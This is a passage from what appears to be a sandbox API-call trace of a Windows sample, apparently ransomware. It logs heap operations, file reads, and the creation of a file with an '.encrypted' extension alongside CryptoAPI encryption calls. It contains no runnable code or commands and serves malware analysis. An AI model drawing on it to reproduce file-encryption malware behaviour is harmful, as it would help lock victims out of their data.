wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0030.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0030.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0030.615] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0030.615] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0030.615] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0030.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0030.615] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.615] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0030.615] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0030.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0030.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0030.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0030.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0030.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0030.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0030.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0030.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0030.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0030.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0030.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0030.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0030.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0030.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0030.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0030.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0030.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0030.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0030.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0030.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0030.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0030.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0030.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0030.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0030.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0030.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0030.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0030.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc0) returned 0x7c75d0 [0030.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0030.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0030.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0030.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0030.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c75d0 | out: hHeap=0x770000) returned 1 [0030.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0030.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0030.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0030.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0030.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0030.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0030.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0030.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0030.617] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0030.617] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0030.617] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\clveu")) returned 0x10 [0030.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0030.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0030.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0030.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0030.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0030.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0030.617] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0030.617] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x88ffb0 [0030.618] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0030.618] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0030.618] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\AtELWG4 7FDtQ.encrypted.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\clveu\\atelwg4 7fdtq.encrypted.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0030.618] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0030.618] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0030.618] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0030.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0030.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0030.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0030.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0030.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0030.618] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.618] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0030.618] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0030.618] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0030.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0030.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0030.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0030.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0030.619] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0030.619] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0030.619] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0030.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0030.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0030.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0030.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0030.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0030.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0030.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0030.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0030.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0030.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0030.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0030.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0030.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0030.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0030.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0030.619] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0030.619] ReadFile (in: hFile=0x128, lpBuffer=0x936008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x936008*, lpNumberOfBytesRead=0x6ae9b8*=0x4857, lpOverlapped=0x0) returned 1 [0030.621] ReadFile (in: hFile=0x128, lpBuffer=0x936008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x936008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0030.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0030.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0030.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0030.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0030.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4857) returned 0x946010 [0030.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0030.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0030.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0030.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0030.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0030.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0030.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4857) returned 0x89ffb8 [0030.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x946010 | out: hHeap=0x770000) returned 1 [0030.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0030.622] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0030.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0030.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0030.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0030.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0030.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4857) returned 0x946010 [0030.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0030.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x946010 | out: hHeap=0x770000) returned 1 [0030.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0030.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0030.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0030.622] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0030.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0030.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0030.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0030.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0030.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0030.623] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0030.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0030.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0030.623] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0030.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0030.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1b8 [0030.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0030.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0030.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0030.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0030.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4857) returned 0x946010 [0030.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0030.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1c8 [0030.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0030.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0030.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0030.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da3b8 [0030.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0030.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0030.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0030.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da408 [0030.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0030.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0030.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0030.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c928 [0030.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0030.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0030.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0030.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0030.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0030.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4857) returned 0x8a4818 [0030.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0030.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0030.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0030.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0030.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0030.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0030.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0030.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0030.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0030.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0030.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0030.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0030.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0030.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0030.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0030.624] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0030.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0030.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0030.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0030.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0030.625] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0030.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0030.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0030.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0030.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0030.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0030.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0030.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0030.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0030.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0030.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0030.625] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0030.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0030.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0030.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0030.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da278 [0030.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0030.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0030.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0030.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0030.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889688 [0030.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0030.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0030.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0030.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0030.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0030.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0030.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0030.625] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0030.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0030.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0030.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0030.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0030.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0030.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0030.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0030.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0030.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0030.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0030.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0030.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0030.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0030.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 